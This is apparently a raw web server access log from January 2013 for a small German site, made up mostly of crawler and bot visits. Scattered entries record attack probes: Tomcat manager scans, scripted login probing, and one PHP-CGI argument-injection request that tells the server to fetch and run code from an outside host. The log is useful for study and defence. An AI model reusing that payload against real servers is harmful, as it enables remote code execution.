65.222.230.80 - - [19/Jan/2013:12:49:59 +0100] "GET /manager/html HTTP/1.1" 404 317 "-" "Mozilla/5.0 (Windows NT 5.1; rv:5.0) Gecko/20100101 Firefox/5.0"
65.222.230.80 - - [19/Jan/2013:12:49:59 +0100] "GET /manager/html HTTP/1.1" 404 317 "-" "Mozilla/5.0 (Windows NT 5.1; rv:5.0) Gecko/20100101 Firefox/5.0"
65.222.230.80 - - [19/Jan/2013:12:49:59 +0100] "GET /manager/html HTTP/1.1" 404 317 "-" "Mozilla/5.0 (Windows NT 5.1; rv:5.0) Gecko/20100101 Firefox/5.0"
65.222.230.80 - - [19/Jan/2013:12:49:59 +0100] "GET /manager/html HTTP/1.1" 404 317 "-" "Mozilla/5.0 (Windows NT 5.1; rv:5.0) Gecko/20100101 Firefox/5.0"
65.222.230.80 - - [19/Jan/2013:12:49:59 +0100] "GET /manager/html HTTP/1.1" 404 317 "-" "Mozilla/5.0 (Windows NT 5.1; rv:5.0) Gecko/20100101 Firefox/5.0"
65.222.230.80 - - [19/Jan/2013:12:49:59 +0100] "GET /manager/html HTTP/1.1" 404 317 "-" "Mozilla/5.0 (Windows NT 5.1; rv:5.0) Gecko/20100101 Firefox/5.0"
65.222.230.80 - - [19/Jan/2013:12:49:59 +0100] "GET /manager/html HTTP/1.1" 404 317 "-" "Mozilla/5.0 (Windows NT 5.1; rv:5.0) Gecko/20100101 Firefox/5.0"
65.222.230.80 - - [19/Jan/2013:12:49:59 +0100] "GET /manager/html HTTP/1.1" 404 317 "-" "Mozilla/5.0 (Windows NT 5.1; rv:5.0) Gecko/20100101 Firefox/5.0"
65.222.230.80 - - [19/Jan/2013:12:49:59 +0100] "GET /manager/html HTTP/1.1" 404 317 "-" "Mozilla/5.0 (Windows NT 5.1; rv:5.0) Gecko/20100101 Firefox/5.0"
65.222.230.80 - - [19/Jan/2013:12:49:59 +0100] "GET /manager/html HTTP/1.1" 404 317 "-" "Mozilla/5.0 (Windows NT 5.1; rv:5.0) Gecko/20100101 Firefox/5.0"
83.133.125.202 - - [19/Jan/2013:14:27:15 +0100] "GET / HTTP/1.1" 200 1229 "http://www.bigfinder.de/online-11.html" "Mozilla/4.0 (compatible; MSIE 9.0; Windows NT 5.1)"
83.133.125.202 - - [19/Jan/2013:14:27:15 +0100] "GET / HTTP/1.0" 200 1229 "-" "-"
83.133.125.202 - - [19/Jan/2013:14:27:15 +0100] "GET / HTTP/1.0" 200 1229 "-" "-"
176.9.139.112 - - [19/Jan/2013:14:52:45 +0100] "GET /robots.txt HTTP/1.1" 404 322 "-" "Mozilla/5.0 (compatible; SISTRIX Crawler; http://crawler.sistrix.net/)"
176.9.139.112 - - [19/Jan/2013:14:52:45 +0100] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (compatible; SISTRIX Crawler; http://crawler.sistrix.net/)"
76.99.197.68 - - [19/Jan/2013:14:52:55 +0100] "GET / HTTP/1.0" 200 1229 "-" "-"
204.145.90.146 - - [19/Jan/2013:15:42:29 +0100] "GET http://204.145.90.146/proxychecker/check.cgi?action=getinfo HTTP/1.1" 404 328 "http://www.google.com/search?hl=ru&q=free+proxy+checker&sourceid=navclient-ff&ie=UTF-8" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1)"
65.55.213.73 - - [19/Jan/2013:16:07:13 +0100] "GET /robots.txt HTTP/1.1" 404 320 "-" "msnbot/2.0b (+http://search.msn.com/msnbot.htm)"
65.55.213.73 - - [19/Jan/2013:16:07:14 +0100] "GET / HTTP/1.1" 200 1229 "-" "msnbot/2.0b (+http://search.msn.com/msnbot.htm)"
141.8.147.1 - - [19/Jan/2013:16:08:38 +0100] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (compatible; YandexBot/3.0; +http://yandex.com/bots)"
141.8.147.1 - - [19/Jan/2013:17:51:07 +0100] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (compatible; YandexBot/3.0; +http://yandex.com/bots)"
173.254.193.138 - - [19/Jan/2013:20:46:25 +0100] "GET / HTTP/1.1" 200 1229 "-" "Python-urllib/2.4"
173.254.193.138 - - [19/Jan/2013:20:46:25 +0100] "GET /login HTTP/1.1" 404 310 "-" "Python-urllib/2.4"
173.254.193.138 - - [19/Jan/2013:20:46:25 +0100] "GET / HTTP/1.1" 200 1229 "-" "Python-urllib/2.4"
173.254.193.138 - - [19/Jan/2013:20:46:25 +0100] "GET / HTTP/1.1" 200 1229 "-" "Python-urllib/2.4"
173.254.193.138 - - [19/Jan/2013:20:46:25 +0100] "GET / HTTP/1.1" 200 1229 "-" "Python-urllib/2.4"
173.254.193.138 - - [19/Jan/2013:20:46:25 +0100] "GET / HTTP/1.1" 200 1229 "-" "Python-urllib/2.4"
173.254.193.138 - - [19/Jan/2013:20:46:25 +0100] "GET / HTTP/1.1" 200 1229 "-" "Python-urllib/2.4"
173.254.193.138 - - [19/Jan/2013:20:46:25 +0100] "GET /login HTTP/1.1" 404 310 "-" "Python-urllib/2.4"
173.254.193.138 - - [19/Jan/2013:20:46:26 +0100] "GET / HTTP/1.1" 200 1229 "-" "Python-urllib/2.4"
173.254.193.138 - - [19/Jan/2013:20:46:26 +0100] "GET / HTTP/1.1" 200 1229 "-" "Python-urllib/2.4"
173.254.193.138 - - [19/Jan/2013:20:46:26 +0100] "GET / HTTP/1.1" 200 1229 "-" "Python-urllib/2.4"
173.254.193.138 - - [19/Jan/2013:20:46:26 +0100] "GET /login HTTP/1.1" 404 310 "-" "Python-urllib/2.4"
173.254.193.138 - - [19/Jan/2013:20:46:26 +0100] "GET / HTTP/1.1" 200 1229 "-" "Python-urllib/2.4"
173.254.193.138 - - [19/Jan/2013:20:46:26 +0100] "GET /login HTTP/1.1" 404 310 "-" "Python-urllib/2.4"
173.254.193.138 - - [19/Jan/2013:20:46:26 +0100] "GET /login HTTP/1.1" 404 310 "-" "Python-urllib/2.4"
173.254.193.138 - - [19/Jan/2013:20:46:26 +0100] "GET /login HTTP/1.1" 404 310 "-" "Python-urllib/2.4"
173.254.193.138 - - [19/Jan/2013:20:46:26 +0100] "GET /login HTTP/1.1" 404 310 "-" "Python-urllib/2.4"
173.254.193.138 - - [19/Jan/2013:20:46:26 +0100] "GET /login HTTP/1.1" 404 310 "-" "Python-urllib/2.4"
173.254.193.138 - - [19/Jan/2013:20:46:26 +0100] "GET /login HTTP/1.1" 404 310 "-" "Python-urllib/2.4"
173.254.193.138 - - [19/Jan/2013:20:46:26 +0100] "GET /login HTTP/1.1" 404 310 "-" "Python-urllib/2.4"
82.247.243.54 - - [20/Jan/2013:00:05:00 +0100] "GET / HTTP/1.0" 200 1229 "-" "-"
178.79.168.196 - - [20/Jan/2013:00:13:22 +0100] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (compatible; MSIE 8.0; Windows NT 5.1; SLCC1; .NET CLR 1.1.4322)"
5.9.7.208 - - [20/Jan/2013:06:01:01 +0100] "GET / HTTP/1.0" 200 1229 "-" "Mozilla/5.0 (compatible; MJ12bot/v1.4.3; http://www.majestic12.co.uk/bot.php?+)"
84.151.14.233 - - [20/Jan/2013:06:24:45 +0100] "GET / HTTP/1.0" 200 1229 "-" "-"
92.240.68.153 - - [20/Jan/2013:06:33:33 +0100] "GET http://www.accessexcellence.org/AE/AEC/CC/heart_graphics/Open_Heart.gif HTTP/1.1" 404 355 "-" "webcollage/1.135a"
5.9.112.179 - - [20/Jan/2013:07:53:52 +0100] "GET /robots.txt HTTP/1.1" 404 337 "-" "Mozilla/5.0 (compatible; SISTRIX Crawler; http://crawler.sistrix.net/)"
5.9.112.179 - - [20/Jan/2013:07:53:52 +0100] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (compatible; SISTRIX Crawler; http://crawler.sistrix.net/)"
206.253.226.23 - - [20/Jan/2013:08:11:23 +0100] "HEAD / HTTP/1.1" 200 - "-" "Mozilla/5.0 (compatible; oBot/2.3.1; +http://filterdb.iss.net/crawler/)"
94.102.51.246 - - [20/Jan/2013:09:36:58 +0100] "GET http://24x7-allrequestsallowed.com/?PHPSESSID=7jy745aa00143SSQJ_W_EFBF%5CC HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (Windows NT 6.1; rv:16.0) Gecko/20100101 Firefox/16.0"
157.55.33.80 - - [20/Jan/2013:10:20:53 +0100] "GET /robots.txt HTTP/1.1" 404 320 "-" "Mozilla/5.0 (compatible; bingbot/2.0; +http://www.bing.com/bingbot.htm)"
157.55.33.80 - - [20/Jan/2013:10:22:20 +0100] "GET /seiten/kontakt.php HTTP/1.1" 404 328 "-" "Mozilla/5.0 (compatible; bingbot/2.0; +http://www.bing.com/bingbot.htm)"
5.9.7.208 - - [20/Jan/2013:14:40:06 +0100] "GET /robots.txt HTTP/1.0" 404 326 "-" "Mozilla/5.0 (compatible; MJ12bot/v1.4.3; http://www.majestic12.co.uk/bot.php?+)"
5.9.7.208 - - [20/Jan/2013:14:41:04 +0100] "GET /Anfahrt.php HTTP/1.0" 404 327 "-" "Mozilla/5.0 (compatible; MJ12bot/v1.4.3; http://www.majestic12.co.uk/bot.php?+)"
66.249.76.157 - - [20/Jan/2013:14:56:12 +0100] "GET /robots.txt HTTP/1.1" 404 315 "-" "Mozilla/5.0 (compatible; Googlebot/2.1; +http://www.google.com/bot.html)"
66.249.78.165 - - [20/Jan/2013:14:56:13 +0100] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (compatible; Googlebot/2.1; +http://www.google.com/bot.html)"
65.55.213.73 - - [20/Jan/2013:15:59:31 +0100] "GET /robots.txt HTTP/1.1" 404 320 "-" "msnbot/2.0b (+http://search.msn.com/msnbot.htm)"
65.55.213.73 - - [20/Jan/2013:15:59:32 +0100] "GET / HTTP/1.1" 200 1229 "-" "msnbot/2.0b (+http://search.msn.com/msnbot.htm)"
64.246.165.160 - - [20/Jan/2013:15:59:38 +0100] "GET /robots.txt HTTP/1.0" 404 320 "-" "Mozilla/5.0 (Windows; U; Windows NT 5.1; en; rv:1.9.0.13) Gecko/2009073022 Firefox/3.5.2 (.NET CLR 3.5.30729) SurveyBot/2.3 (DomainTools)"
64.246.165.160 - - [20/Jan/2013:15:59:38 +0100] "GET / HTTP/1.1" 200 1229 "http://whois.domaintools.com/mink-berlin.de" "Mozilla/5.0 (Windows; U; Windows NT 5.1; en; rv:1.9.0.13) Gecko/2009073022 Firefox/3.5.2 (.NET CLR 3.5.30729) SurveyBot/2.3 (DomainTools)"
5.9.7.208 - - [20/Jan/2013:21:07:55 +0100] "GET /robots.txt HTTP/1.0" 404 317 "-" "Mozilla/5.0 (compatible; MJ12bot/v1.4.3; http://www.majestic12.co.uk/bot.php?+)"
5.9.7.208 - - [20/Jan/2013:21:08:02 +0100] "GET /across-health/newsletter/issue11 HTTP/1.0" 404 339 "-" "Mozilla/5.0 (compatible; MJ12bot/v1.4.3; http://www.majestic12.co.uk/bot.php?+)"
38.111.147.84 - - [20/Jan/2013:22:18:18 +0100] "GET /robots.txt HTTP/1.0" 404 320 "-" "TurnitinBot/2.1 (http://www.turnitin.com/robot/crawlerinfo.html)"
38.111.147.84 - - [20/Jan/2013:22:18:23 +0100] "GET / HTTP/1.0" 304 - "-" "TurnitinBot/2.1 (http://www.turnitin.com/robot/crawlerinfo.html)"
141.8.147.1 - - [21/Jan/2013:00:37:49 +0100] "GET /robots.txt HTTP/1.1" 404 322 "-" "Mozilla/5.0 (compatible; YandexBot/3.0; +http://yandex.com/bots)"
141.8.147.1 - - [21/Jan/2013:02:16:44 +0100] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (compatible; YandexBot/3.0; +http://yandex.com/bots)"
194.153.113.7 - - [21/Jan/2013:02:23:43 +0100] "HEAD / HTTP/1.1" 200 - "-" "Mozilla/5.0 (compatible; oBot/2.3.1; +http://filterdb.iss.net/crawler/)"
91.121.85.145 - - [21/Jan/2013:03:28:41 +0100] "GET http://www.youtube.com/watch?v=Z1DwHIhnj6c HTTP/1.1" 404 312 "-" "Manage your linux/unix boxes with one hand :)"
67.19.79.218 - - [21/Jan/2013:04:03:29 +0100] "GET /robots.txt HTTP/1.0" 404 311 "-" "Mozilla/4.0 (compatible; MSIE 5.01; Windows NT)"
5.9.7.208 - - [21/Jan/2013:05:05:28 +0100] "GET /Heizoel.htm HTTP/1.0" 404 321 "-" "Mozilla/5.0 (compatible; MJ12bot/v1.4.3; http://www.majestic12.co.uk/bot.php?+)"
5.9.7.208 - - [21/Jan/2013:05:05:33 +0100] "GET /seiten/optiplus_detail.php?det=betrieb HTTP/1.0" 404 336 "-" "Mozilla/5.0 (compatible; MJ12bot/v1.4.3; http://www.majestic12.co.uk/bot.php?+)"
5.9.7.208 - - [21/Jan/2013:05:05:42 +0100] "GET /seiten/optiplus_detail.php?det=geru HTTP/1.0" 404 336 "-" "Mozilla/5.0 (compatible; MJ12bot/v1.4.3; http://www.majestic12.co.uk/bot.php?+)"
5.9.7.208 - - [21/Jan/2013:05:05:50 +0100] "GET /seiten/optiplus_detail.php?det=guete HTTP/1.0" 404 336 "-" "Mozilla/5.0 (compatible; MJ12bot/v1.4.3; http://www.majestic12.co.uk/bot.php?+)"
5.9.7.208 - - [21/Jan/2013:05:05:58 +0100] "GET /seiten/optiplus_detail.php?det=korr HTTP/1.0" 404 336 "-" "Mozilla/5.0 (compatible; MJ12bot/v1.4.3; http://www.majestic12.co.uk/bot.php?+)"
5.9.7.208 - - [21/Jan/2013:05:06:05 +0100] "GET /seiten/optiplus_detail.php?det=lager HTTP/1.0" 404 336 "-" "Mozilla/5.0 (compatible; MJ12bot/v1.4.3; http://www.majestic12.co.uk/bot.php?+)"
5.9.7.208 - - [21/Jan/2013:05:06:13 +0100] "GET /seiten/optiplus_detail.php?det=pumpe HTTP/1.0" 404 336 "-" "Mozilla/5.0 (compatible; MJ12bot/v1.4.3; http://www.majestic12.co.uk/bot.php?+)"
5.9.7.208 - - [21/Jan/2013:05:06:25 +0100] "GET /seiten/optiplus_detail.php?det=umwelt HTTP/1.0" 404 336 "-" "Mozilla/5.0 (compatible; MJ12bot/v1.4.3; http://www.majestic12.co.uk/bot.php?+)"
5.9.7.208 - - [21/Jan/2013:07:12:23 +0100] "GET /dke.html HTTP/1.0" 404 321 "-" "Mozilla/5.0 (compatible; MJ12bot/v1.4.3; http://www.majestic12.co.uk/bot.php?+)"
94.102.51.246 - - [21/Jan/2013:08:37:05 +0100] "GET http://24x7-allrequestsallowed.com/?PHPSESSID=7jy745aa00143SSQJ_W_EFBF%5CN HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (Windows NT 6.1; rv:16.0) Gecko/20100101 Firefox/16.0"
84.151.7.243 - - [21/Jan/2013:08:41:20 +0100] "GET / HTTP/1.0" 200 1229 "-" "-"
87.29.92.147 - - [21/Jan/2013:08:51:42 +0100] "GET /?-d+allow_url_include%3d1+-d+auto_prepend_file%3dhttp://www.hoteltill.it/test.php HTTP/1.1" 200 1229 "-" "Python-urllib/2.7"
85.13.147.71 - - [21/Jan/2013:10:33:56 +0100] "HEAD / HTTP/1.1" 200 - "-" "-"
85.13.147.71 - - [21/Jan/2013:10:33:56 +0100] "HEAD / HTTP/1.1" 200 - "-" "-"
193.142.62.64 - - [21/Jan/2013:11:23:06 +0100] "HEAD / HTTP/1.1" 200 - "-" "-"
193.142.62.64 - - [21/Jan/2013:11:38:57 +0100] "HEAD / HTTP/1.1" 200 - "-" "-"
193.142.62.64 - - [21/Jan/2013:11:44:27 +0100] "HEAD / HTTP/1.1" 200 - "-" "-"
193.142.62.64 - - [21/Jan/2013:11:45:01 +0100] "HEAD / HTTP/1.1" 200 - "-" "-"
157.55.32.80 - - [21/Jan/2013:12:43:47 +0100] "GET /robots.txt HTTP/1.1" 404 322 "-" "Mozilla/5.0 (compatible; bingbot/2.0; +http://www.bing.com/bingbot.htm)"
157.55.32.80 - - [21/Jan/2013:12:45:29 +0100] "GET / HTTP/1.1" 304 - "-" "Mozilla/5.0 (compatible; bingbot/2.0; +http://www.bing.com/bingbot.htm)"
141.8.147.1 - - [21/Jan/2013:12:53:33 +0100] "GET /robots.txt HTTP/1.1" 404 328 "-" "Mozilla/5.0 (compatible; YandexBot/3.0; +http://yandex.com/bots)"
5.9.7.208 - - [21/Jan/2013:13:47:13 +0100] "GET / HTTP/1.0" 200 1229 "-" "Mozilla/5.0 (compatible; MJ12bot/v1.4.3; http://www.majestic12.co.uk/bot.php?+)"
5.9.7.208 - - [21/Jan/2013:14:07:36 +0100] "GET / HTTP/1.0" 200 1229 "-" "Mozilla/5.0 (compatible; MJ12bot/v1.4.3; http://www.majestic12.co.uk/bot.php?+)"
78.30.200.81 - - [21/Jan/2013:14:10:33 +0100] "GET /robots.txt HTTP/1.0" 404 320 "-" "Mozilla/5.0 (compatible; MJ12bot/v1.4.3; http://www.majestic12.co.uk/bot.php?+)"
78.30.200.81 - - [21/Jan/2013:14:10:35 +0100] "GET / HTTP/1.0" 200 1229 "-" "Mozilla/5.0 (compatible; MJ12bot/v1.4.3; http://www.majestic12.co.uk/bot.php?+)"
88.135.201.228 - - [21/Jan/2013:14:20:09 +0100] "GET /robots.txt HTTP/1.0" 404 320 "-" "Mozilla/5.0 (compatible; MJ12bot/v1.4.3; http://www.majestic12.co.uk/bot.php?+)"
88.135.201.228 - - [21/Jan/2013:14:20:11 +0100] "GET / HTTP/1.0" 200 1229 "-" "Mozilla/5.0 (compatible; MJ12bot/v1.4.3; http://www.majestic12.co.uk/bot.php?+)"
5.9.7.208 - - [21/Jan/2013:14:21:54 +0100] "GET /robots.txt HTTP/1.0" 404 320 "-" "Mozilla/5.0 (compatible; MJ12bot/v1.4.3; http://www.majestic12.co.uk/bot.php?+)"
5.9.7.208 - - [21/Jan/2013:14:27:12 +0100] "GET /robots.txt HTTP/1.0" 404 312 "-" "Mozilla/5.0 (compatible; MJ12bot/v1.4.3; http://www.majestic12.co.uk/bot.php?+)"
5.9.7.208 - - [21/Jan/2013:14:27:18 +0100] "GET /robots.txt HTTP/1.0" 404 320 "-" "Mozilla/5.0 (compatible; MJ12bot/v1.4.3; http://www.majestic12.co.uk/bot.php?+)"
5.9.7.208 - - [21/Jan/2013:14:30:42 +0100] "GET / HTTP/1.0" 200 1229 "-" "Mozilla/5.0 (compatible; MJ12bot/v1.4.3; http://www.majestic12.co.uk/bot.php?+)"
5.9.7.208 - - [21/Jan/2013:14:30:50 +0100] "GET / HTTP/1.0" 200 1229 "-" "Mozilla/5.0 (compatible; MJ12bot/v1.4.3; http://www.majestic12.co.uk/bot.php?+)"
221.2.209.46 - - [21/Jan/2013:14:34:59 +0100] "GET /manager/html HTTP/1.1" 404 317 "-" "Mozilla/3.0 (compatible; Indy Library)"
221.2.209.46 - - [21/Jan/2013:14:34:59 +0100] "GET /manager/html HTTP/1.1" 404 317 "-" "Mozilla/3.0 (compatible; Indy Library)"
5.9.7.208 - - [21/Jan/2013:14:49:40 +0100] "GET / HTTP/1.0" 200 1229 "-" "Mozilla/5.0 (compatible; MJ12bot/v1.4.3; http://www.majestic12.co.uk/bot.php?+)"
5.9.7.208 - - [21/Jan/2013:14:52:44 +0100] "GET /robots.txt HTTP/1.0" 404 320 "-" "Mozilla/5.0 (compatible; MJ12bot/v1.4.3; http://www.majestic12.co.uk/bot.php?+)"
5.9.7.208 - - [21/Jan/2013:14:59:50 +0100] "GET /robots.txt HTTP/1.0" 404 320 "-" "Mozilla/5.0 (compatible; MJ12bot/v1.4.3; http://www.majestic12.co.uk/bot.php?+)"
188.36.137.160 - - [21/Jan/2013:15:01:30 +0100] "GET /robots.txt HTTP/1.0" 404 320 "-" "Mozilla/5.0 (compatible; MJ12bot/v1.4.3; http://www.majestic12.co.uk/bot.php?+)"
188.36.137.160 - - [21/Jan/2013:15:01:34 +0100] "GET / HTTP/1.0" 200 1229 "-" "Mozilla/5.0 (compatible; MJ12bot/v1.4.3; http://www.majestic12.co.uk/bot.php?+)"
5.9.7.208 - - [21/Jan/2013:15:02:15 +0100] "GET / HTTP/1.0" 200 1229 "-" "Mozilla/5.0 (compatible; MJ12bot/v1.4.3; http://www.majestic12.co.uk/bot.php?+)"
199.217.119.217 - - [21/Jan/2013:15:16:15 +0100] "GET /robots.txt HTTP/1.0" 404 320 "-" "Mozilla/5.0 (compatible; MJ12bot/v1.4.3; http://www.majestic12.co.uk/bot.php?+)"
178.25.93.230 - - [21/Jan/2013:15:16:26 +0100] "GET /robots.txt HTTP/1.0" 404 320 "-" "Mozilla/5.0 (compatible; MJ12bot/v1.4.3; http://www.majestic12.co.uk/bot.php?+)"
178.25.93.230 - - [21/Jan/2013:15:16:30 +0100] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (compatible; MJ12bot/v1.4.3; http://www.majestic12.co.uk/bot.php?+)"
199.217.119.217 - - [21/Jan/2013:15:16:35 +0100] "GET / HTTP/1.0" 200 1229 "-" "Mozilla/5.0 (compatible; MJ12bot/v1.4.3; http://www.majestic12.co.uk/bot.php?+)"
46.119.124.93 - - [21/Jan/2013:15:20:43 +0100] "GET /robots.txt HTTP/1.0" 404 320 "-" "Mozilla/5.0 (compatible; MJ12bot/v1.4.3; http://www.majestic12.co.uk/bot.php?+)"
46.119.124.93 - - [21/Jan/2013:15:20:45 +0100] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (compatible; MJ12bot/v1.4.3; http://www.majestic12.co.uk/bot.php?+)"
5.9.7.208 - - [21/Jan/2013:15:21:28 +0100] "GET /robots.txt HTTP/1.0" 404 327 "-" "Mozilla/5.0 (compatible; MJ12bot/v1.4.3; http://www.majestic12.co.uk/bot.php?+)"
5.9.7.208 - - [21/Jan/2013:15:22:02 +0100] "GET /robots.txt HTTP/1.0" 404 327 "-" "Mozilla/5.0 (compatible; MJ12bot/v1.4.3; http://www.majestic12.co.uk/bot.php?+)"
88.90.105.243 - - [21/Jan/2013:15:28:41 +0100] "GET /robots.txt HTTP/1.0" 404 320 "-" "Mozilla/5.0 (compatible; MJ12bot/v1.4.3; http://www.majestic12.co.uk/bot.php?+)"
88.90.105.243 - - [21/Jan/2013:15:28:43 +0100] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (compatible; MJ12bot/v1.4.3; http://www.majestic12.co.uk/bot.php?+)"
178.77.126.55 - - [21/Jan/2013:15:30:03 +0100] "GET /robots.txt HTTP/1.1" 404 320 "-" "Mozilla/5.0 (compatible; CareerBot/1.1; +http://www.career-x.de/bot.html)"
178.77.126.55 - - [21/Jan/2013:15:30:03 +0100] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (compatible; CareerBot/1.1; +http://www.career-x.de/bot.html)"
5.9.7.208 - - [21/Jan/2013:15:53:37 +0100] "GET /robots.txt HTTP/1.0" 404 320 "-" "Mozilla/5.0 (compatible; MJ12bot/v1.4.3; http://www.majestic12.co.uk/bot.php?+)"
141.8.147.1 - - [21/Jan/2013:15:57:30 +0100] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (compatible; YandexBot/3.0; +http://yandex.com/bots)"
65.55.213.73 - - [21/Jan/2013:17:26:58 +0100] "GET /robots.txt HTTP/1.1" 404 320 "-" "msnbot/2.0b (+http://search.msn.com/msnbot.htm)"
65.55.213.73 - - [21/Jan/2013:17:26:58 +0100] "GET / HTTP/1.1" 200 1229 "-" "msnbot/2.0b (+http://search.msn.com/msnbot.htm)"
141.8.147.1 - - [21/Jan/2013:18:36:07 +0100] "GET /robots.txt HTTP/1.1" 404 320 "-" "Mozilla/5.0 (compatible; YandexBot/3.0; +http://yandex.com/bots)"
176.9.30.234 - - [21/Jan/2013:20:24:44 +0100] "GET /robots.txt HTTP/1.0" 404 328 "-" "Mozilla/5.0 (compatible; MJ12bot/v1.4.3; http://www.majestic12.co.uk/bot.php?+)"
176.9.30.234 - - [21/Jan/2013:20:24:51 +0100] "GET /kirmesgruppe-meckbach.de/gb/guestbook.php HTTP/1.0" 404 359 "-" "Mozilla/5.0 (compatible; MJ12bot/v1.4.3; http://www.majestic12.co.uk/bot.php?+)"
92.240.68.152 - - [21/Jan/2013:20:50:27 +0100] "GET http://blogs.elle.com.hk/danatrang/files/2011/04/Tiffany-bohemian.jpg HTTP/1.1" 404 353 "-" "webcollage/1.135a"
217.225.172.170 - - [21/Jan/2013:23:57:17 +0100] "GET / HTTP/1.1" 200 1229 "http://www.backlink-webkatalog.de/" "T-Online Browser (Windows NT 6.1; de)"
5.9.7.208 - - [22/Jan/2013:00:28:52 +0100] "GET /robots.txt HTTP/1.0" 404 327 "-" "Mozilla/5.0 (compatible; MJ12bot/v1.4.3; http://www.majestic12.co.uk/bot.php?+)"
5.9.7.208 - - [22/Jan/2013:00:28:54 +0100] "GET /index.html HTTP/1.0" 200 1229 "-" "Mozilla/5.0 (compatible; MJ12bot/v1.4.3; http://www.majestic12.co.uk/bot.php?+)"
5.9.7.208 - - [22/Jan/2013:00:28:56 +0100] "GET /kontakt.html HTTP/1.0" 404 329 "-" "Mozilla/5.0 (compatible; MJ12bot/v1.4.3; http://www.majestic12.co.uk/bot.php?+)"
141.8.147.1 - - [22/Jan/2013:00:48:47 +0100] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (compatible; YandexBot/3.0; +http://yandex.com/bots)"
46.4.67.68 - - [22/Jan/2013:00:52:25 +0100] "GET /robots.txt HTTP/1.0" 404 320 "-" "Mozilla/5.0 (compatible; MJ12bot/v1.4.3; http://www.majestic12.co.uk/bot.php?+)"
46.4.67.68 - - [22/Jan/2013:01:21:19 +0100] "GET /robots.txt HTTP/1.0" 404 320 "-" "Mozilla/5.0 (compatible; MJ12bot/v1.4.3; http://www.majestic12.co.uk/bot.php?+)"
46.4.67.68 - - [22/Jan/2013:01:21:21 +0100] "GET /index_en.html HTTP/1.0" 404 323 "-" "Mozilla/5.0 (compatible; MJ12bot/v1.4.3; http://www.majestic12.co.uk/bot.php?+)"
46.4.67.68 - - [22/Jan/2013:01:21:23 +0100] "GET /index_fr.html HTTP/1.0" 404 323 "-" "Mozilla/5.0 (compatible; MJ12bot/v1.4.3; http://www.majestic12.co.uk/bot.php?+)"
46.4.67.68 - - [22/Jan/2013:01:21:24 +0100] "GET /index_it.html HTTP/1.0" 404 323 "-" "Mozilla/5.0 (compatible; MJ12bot/v1.4.3; http://www.majestic12.co.uk/bot.php?+)"
46.4.67.68 - - [22/Jan/2013:01:21:26 +0100] "GET /index_sp.html HTTP/1.0" 404 323 "-" "Mozilla/5.0 (compatible; MJ12bot/v1.4.3; http://www.majestic12.co.uk/bot.php?+)"
216.145.17.190 - - [22/Jan/2013:02:05:09 +0100] "GET /robots.txt HTTP/1.0" 404 334 "-" "Mozilla/5.0 (Windows; U; Windows NT 5.1; en; rv:1.9.0.13) Gecko/2009073022 Firefox/3.5.2 (.NET CLR 3.5.30729) SurveyBot/2.3 (DomainTools)"
216.145.17.190 - - [22/Jan/2013:02:05:10 +0100] "GET / HTTP/1.1" 200 1229 "http://whois.domaintools.com/schraeg-senkrechtaufzuege.de" "Mozilla/5.0 (Windows; U; Windows NT 5.1; en; rv:1.9.0.13) Gecko/2009073022 Firefox/3.5.2 (.NET CLR 3.5.30729) SurveyBot/2.3 (DomainTools)"
157.55.35.113 - - [22/Jan/2013:05:15:53 +0100] "GET /robots.txt HTTP/1.1" 404 320 "-" "Mozilla/5.0 (compatible; bingbot/2.0; +http://www.bing.com/bingbot.htm)"
83.233.55.200 - - [22/Jan/2013:07:18:31 +0100] "GET /test.w00t:) HTTP/1.1" 400 329 "-" "-"
83.233.55.200 - - [22/Jan/2013:07:18:31 +0100] "GET /test.w00t:) HTTP/1.1" 400 329 "-" "-"
83.233.55.200 - - [22/Jan/2013:07:18:31 +0100] "GET /test.w00t:) HTTP/1.1" 400 329 "-" "-"
83.233.55.200 - - [22/Jan/2013:07:18:31 +0100] "GET /test.w00t:) HTTP/1.1" 400 329 "-" "-"
83.233.55.200 - - [22/Jan/2013:07:18:31 +0100] "GET /test.w00t:) HTTP/1.1" 400 329 "-" "-"
83.233.55.200 - - [22/Jan/2013:07:18:31 +0100] "GET /test.w00t:) HTTP/1.1" 400 329 "-" "-"
83.233.55.200 - - [22/Jan/2013:07:18:31 +0100] "GET /test.w00t:) HTTP/1.1" 400 329 "-" "-"
83.233.55.200 - - [22/Jan/2013:07:18:31 +0100] "GET /test.w00t:) HTTP/1.1" 400 329 "-" "-"
83.233.55.200 - - [22/Jan/2013:07:18:31 +0100] "GET /test.w00t:) HTTP/1.1" 400 329 "-" "-"
83.233.55.200 - - [22/Jan/2013:07:18:31 +0100] "GET /test.w00t:) HTTP/1.1" 400 329 "-" "-"
157.55.35.113 - - [22/Jan/2013:08:30:54 +0100] "GET /robots.txt HTTP/1.1" 404 320 "-" "Mozilla/5.0 (compatible; bingbot/2.0; +http://www.bing.com/bingbot.htm)"
157.55.35.113 - - [22/Jan/2013:08:33:05 +0100] "GET / HTTP/1.1" 304 - "-" "Mozilla/5.0 (compatible; bingbot/2.0; +http://www.bing.com/bingbot.htm)"
54.243.1.44 - - [22/Jan/2013:10:38:48 +0100] "GET / HTTP/1.0" 200 1229 "http://www.eatree.com" "-"
141.8.147.1 - - [22/Jan/2013:12:35:35 +0100] "GET /robots.txt HTTP/1.1" 404 320 "-" "Mozilla/5.0 (compatible; YandexBot/3.0; +http://yandex.com/bots)"
95.108.247.251 - - [22/Jan/2013:12:35:37 +0100] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (compatible; YandexBot/3.0; +http://yandex.com/bots)"
193.142.62.64 - - [22/Jan/2013:13:15:41 +0100] "HEAD / HTTP/1.1" 200 - "-" "-"
